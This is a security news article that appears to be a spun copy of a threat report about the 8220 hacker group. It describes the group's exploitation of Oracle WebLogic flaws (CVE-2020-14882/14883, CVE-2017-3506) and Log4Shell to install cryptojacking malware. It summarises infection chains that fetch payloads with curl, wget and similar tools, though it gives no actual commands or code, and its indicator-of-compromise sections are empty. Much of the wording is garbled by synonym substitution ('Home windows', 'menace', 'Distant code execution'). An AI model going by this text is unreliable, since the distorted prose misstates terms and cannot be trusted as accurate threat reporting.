19.3 C
London
Thursday, September 5, 2024

8220 Hacker Group Attacking Home windows and Linux Net Servers


The 8220 hacker group, which was first recognized in 2017 by Cisco Talos, is exploiting each Home windows and Linux internet servers with crypto-jacking malware. Certainly one of their latest actions concerned the exploitation of Oracle WebLogic vulnerability (CVE-2017-3506) and Log4Shell (CVE-2021-44228).

Nevertheless, the historical past of this menace group had a number of exploited vulnerabilities comparable to Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2 purposes. Their TTPs are advanced with totally different publicly launched exploits.

8220 Hacker Group

Along with this, the group was additionally found to be exploiting (CVE-2020-14883), a Distant code execution vulnerability in Oracle WebLogic Server. This exploitation chain is mixed with one other authentication bypass vulnerability (CVE-2020-14882) within the Oracle WebLogic server.

The exploitation strategies of those two vulnerabilities are publicly out there, making it comparatively straightforward for the menace actor to switch and exploit them for malicious functions. 

Two totally different exploit chains had been found, and considered one of them permits the loading of an XML file used for additional phases of execution of instructions on the OS, whereas the opposite one executes Java code with out the usage of an XML file.

An infection Chains

The primary an infection chain makes use of totally different XML information that rely upon the goal OS. Within the case of Linux, the downloading of different information is carried out by way of cURL, wget, lwp-download, and python urllib together with a customized bash operate that encodes it to base64.

Customized bash operate (Supply: Imperva)

The strategy injects a Java code which additionally initially evaluates the OS and executes the identical command strings executed within the first methodology. As soon as the obtain and execution course of takes place, the compromised hosts are contaminated with AgentTesla, rhajk, and nasqa malware variants.

A full report has been printed, which supplies detailed details about the exploitation, command used, encoding, and different data.

Indicators of Compromise

URL

URL

Supply IPs

Supply IPs
Malicious File Hashes
Latest news
Related news

LEAVE A REPLY

Please enter your comment!
Please enter your name here